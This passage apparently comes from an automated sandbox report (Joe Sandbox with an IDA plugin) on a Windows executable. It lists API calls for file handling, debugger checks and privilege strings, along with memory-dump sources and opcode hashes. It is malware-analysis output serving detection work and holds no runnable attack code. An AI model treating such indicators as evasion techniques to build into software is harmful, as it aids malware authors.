                                                                                                                      • Part of subcall function 0058A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0058977F,?,?,005895CF,?,?,?,?,?,005B2641), ref: 0058A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00587139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00587155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00587298
                                                                                                                      • Part of subcall function 00589DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005873BC,?,?,?,00000000), ref: 00589DBC
                                                                                                                      • Part of subcall function 00589DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00589E70
                                                                                                                      • Part of subcall function 00589620: CloseHandle.KERNELBASE(000000FF,?,?,005895D6,?,?,?,?,?,005B2641,000000FF), ref: 0058963B
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A501
                                                                                                                      • Part of subcall function 0058A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0058A325,?,?,?,0058A175,?,00000001,00000000,?,?), ref: 0058A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: 175531fe5d2d87e9a2af3080ee35c40a2f025f8c4d05e36a6b1bb42ed1fb98f5
                                                                                                                    • Instruction ID: e46bb1c80015b565650059cb29772e222bbb40ec5570974fbce553c38d5b90ae
                                                                                                                    • Opcode Fuzzy Hash: 175531fe5d2d87e9a2af3080ee35c40a2f025f8c4d05e36a6b1bb42ed1fb98f5
                                                                                                                    • Instruction Fuzzy Hash: 53C1C571904609AADB21FB74CC49FEEBBA8BF48300F144959FD56B7182DB70EA44CB61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: 07d6795b00cb0f2455ca59c9b7e782c107fe7552cf808e66a533956a8eabeabc
                                                                                                                    • Instruction ID: e3fa30358afb496d4cb9b7bcd9aa6621b95071dd54eae1fedb3cf637d2d34b00
                                                                                                                    • Opcode Fuzzy Hash: 07d6795b00cb0f2455ca59c9b7e782c107fe7552cf808e66a533956a8eabeabc
                                                                                                                    • Instruction Fuzzy Hash: 9CC25B71E042298FDB25DE289D457EEBBB9FB49304F1445EAD40EE7240E774AE818F50
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: 3be596081e119989b72730cccd12ecdaa4814790e8a8fe77ad4c513331e1073a
                                                                                                                    • Instruction ID: 3a03843a81e67c168b3834e138e14fe02f893ebe63026d2538774bbe30e28bca
                                                                                                                    • Opcode Fuzzy Hash: 3be596081e119989b72730cccd12ecdaa4814790e8a8fe77ad4c513331e1073a
                                                                                                                    • Instruction Fuzzy Hash: 3A32D4715102859FDF14EF74C89AAE93FA5BF55700F04047DFD8AAB282DB74AA49CB20
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00582874
                                                                                                                    • _strlen.LIBCMT ref: 00582E3F
                                                                                                                      • Part of subcall function 005902BA: __EH_prolog.LIBCMT ref: 005902BF
                                                                                                                      • Part of subcall function 00591B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0058BAE9,00000000,?,?,?,00010448), ref: 00591BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00582F91
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: a071e8945c85c457d28d39a23e66ff9dfd6b0b0fc0233fdd33045504b39b9274
                                                                                                                    • Instruction ID: a92dcbf11fe3a659bd07d388734cb7890c9d6f7d3a22fcb3b11fef5f59149468
                                                                                                                    • Opcode Fuzzy Hash: a071e8945c85c457d28d39a23e66ff9dfd6b0b0fc0233fdd33045504b39b9274
                                                                                                                    • Instruction Fuzzy Hash: 0162F8716006458FDF19EF34C88A6EA7FA1FF54300F08457EEC9AAB282DB759945CB60
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0059F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0059F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0059F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0059F93A
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: 0322f02dc7d4c3987e9ec1a6bc41974f5d5b5d622d47e9b5fefdc864ae628af2
                                                                                                                    • Instruction ID: f078aedd4532faa9261f52de5ba3588e894619d6b00c4f8b3aba1033de9aa95b
                                                                                                                    • Opcode Fuzzy Hash: 0322f02dc7d4c3987e9ec1a6bc41974f5d5b5d622d47e9b5fefdc864ae628af2
                                                                                                                    • Instruction Fuzzy Hash: 53311875D052199BDF20DFA4D9897CCBBB8BF08304F1041AAE40CAB250EB719B84DF44
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,0059E5E8,0000001C,0059E7DD,00000000,?,?,?,?,?,?,?,0059E5E8,00000004,005E1CEC,0059E86D), ref: 0059E6B4
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0059E5E8,00000004,005E1CEC,0059E86D), ref: 0059E6CF
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                    • Opcode ID: 33b2d6537cdcae1ebdfd8e562fd69785d5a86a58888c998b8b699d032cdc671e
                                                                                                                    • Instruction ID: a6091fa4e770d5822c97728dd2d53fcca5affc446ccd9d6f2a6da7a12b553da1
                                                                                                                    • Opcode Fuzzy Hash: 33b2d6537cdcae1ebdfd8e562fd69785d5a86a58888c998b8b699d032cdc671e
                                                                                                                    • Instruction Fuzzy Hash: 9001D432600109ABDF14DF69DC4AADD7BAAFFC4324F0CC224ED19E6150E734E9058680
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005A8FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005A8FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 005A8FCC
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 7079d20b85cd8759b7112fa15c7625b7a24a32a998350e750c4a659acf2a739a
                                                                                                                    • Instruction ID: 1c74c2c0733cc56554d14d7d91e29541c53b11429925c1dc5ae952d182d38cd0
                                                                                                                    • Opcode Fuzzy Hash: 7079d20b85cd8759b7112fa15c7625b7a24a32a998350e750c4a659acf2a739a
                                                                                                                    • Instruction Fuzzy Hash: B831E77590121DABCB21DF28DC89B9CBBB8BF48310F5042EAE41CA7250EB309F858F44
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction ID: 1380033ec596cc15bd7e563750d358d507b2ebf9e50754c0ccc9a687d2c4afce
                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction Fuzzy Hash: F9022B71E002199BDF18DFA9C8806ADBBF1FF89314F258169D81AE7681D735AE41CB90
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0059AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,005BE72C,?,?), ref: 0059AF84
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169056816-0
                                                                                                                    • Opcode ID: a75f17ba61d3cc604332d4ed2f3d132e45d46f76c531ff174bd4f862af66c4a6
                                                                                                                    • Instruction ID: 1cb9aab9fae5df0e80fd6342bf24fdf98d6775cde27eb468297d5d73d3c10e13
                                                                                                                    • Opcode Fuzzy Hash: a75f17ba61d3cc604332d4ed2f3d132e45d46f76c531ff174bd4f862af66c4a6
                                                                                                                    • Instruction Fuzzy Hash: D901717A110348AADB109F64DC49FDA7BBCFF19710F005422FA05A71A0D774A929DBA5
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00586DDF,00000000,00000400), ref: 00586C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00586C95
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005B19EF,?,?,00000008,?,?,005B168F,00000000), ref: 005B1C21
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0059F66A
                                                                                                                    Similarity
                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2325560087-0
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0058B16B
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 0-4203073231
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0059F3A5), ref: 0059F9DA
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 54951025-0
                                                                                                                    • Opcode ID: 04066f76e72a5aaee02e4ca00463574b315b1238ab5e115411fe1db3e96a48fa
                                                                                                                    • Instruction ID: 4e5cb2b5701e85eaacc7d84eb57eebb1aae2f6fc40a8e033906c9b73d0635f80
                                                                                                                    • Opcode Fuzzy Hash: 04066f76e72a5aaee02e4ca00463574b315b1238ab5e115411fe1db3e96a48fa
                                                                                                                    • Instruction Fuzzy Hash: D6A012301011008BC3448F345E48208369C552018070402155004C4020EE205154B600
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction ID: d31c937cde15fee2ad6403a25f6fdecd6b2ab42bde0ddf0981a3dd8467433899
                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction Fuzzy Hash: 0962B0716047859FCF25CF28C4906B9BFE1BF95304F08896EE8AA8B346D734E949CB11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction ID: 4f18828618ae1adf91134b7f9713fcb26e1ae7875537691a9d106ca713ce15a1
                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction Fuzzy Hash: 2862B3716187498FCF19CF28C8845B9BFE1BF99304F18896EE89A8B346D730E945CB15
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: dd56dd6f552ae16af4eee0e97a8e6034bbca11515ad18326fe8b4f30caeea7d2
                                                                                                                    • Instruction ID: 3e5d01f73b0258cf8cdc5da54366ca3b13de7189fe060e29d6220a3d821605b0
                                                                                                                    • Opcode Fuzzy Hash: dd56dd6f552ae16af4eee0e97a8e6034bbca11515ad18326fe8b4f30caeea7d2
                                                                                                                    • Instruction Fuzzy Hash: DED1A4B16083458FDF14DF28C84475BBFE5BF89308F08496EE8999B242D774EA09CB56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a4161ad7627cf83b398d8f47988f7ee256385291905c0d22a219c6c290391b12
                                                                                                                    • Instruction ID: 8163874a487b1344f780f39afa8ecdce08497dd9fefc42276576b6afab6cb181
                                                                                                                    • Opcode Fuzzy Hash: a4161ad7627cf83b398d8f47988f7ee256385291905c0d22a219c6c290391b12
                                                                                                                    • Instruction Fuzzy Hash: 74E159755083948FC304CF69D89086ABFF0BF9A300F49095EF9D497352C235EA59EBA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction ID: 5ca7263fc8a412bfe9117a574a4ea361c142686d75e6e85586477d3e3a65c747
                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction Fuzzy Hash: 129149B02003469BDF24EB64D895FBE7FD5FB90300F10092DE99697282EA649946CB52
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction ID: bf8bd25d0b13cbf87138d4b8983368f93ce77cab506d3783f4871507861b1eb9
                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction Fuzzy Hash: 8C812BB13043465BEF24DE68C895FBD3FD4BB95304F044D2DE98A8B282DA648D878F52
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6567fc4e92117604f8d138ed684821eaa3adc0667de7fc47dcb28a9e85dbf25a
                                                                                                                    • Instruction ID: efd313ebcf6d13ca7950e2f51a3759c6cdb306467b391f3bd12e652a4f2fec7c
                                                                                                                    • Opcode Fuzzy Hash: 6567fc4e92117604f8d138ed684821eaa3adc0667de7fc47dcb28a9e85dbf25a
                                                                                                                    • Instruction Fuzzy Hash: B9617979600F0966DE389E686899FBE2F94FFC7340F540D1AE543DF282F6A1DD428611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction ID: 3dcafcf4bd0a0a6285830f6d8f69e35d530f55b60ef3775adb0730186d68d75f
                                                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction Fuzzy Hash: F9513461600E499BDF3446A8855EFBF6FC5BB83300F185819E983CB282F645EE05C7A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0058E30E
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                      • Part of subcall function 00591DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,005C1030,00000200,0058D928,00000000,?,00000050,005C1030), ref: 00591DC4
                                                                                                                    • _strlen.LIBCMT ref: 0058E32F
                                                                                                                    • SetDlgItemTextW.USER32(?,005BE274,?), ref: 0058E38F
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0058E3C9
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0058E3D5
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0058E475
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0058E4A2
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0058E4DB
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0058E4E3
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0058E4EE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0058E51B
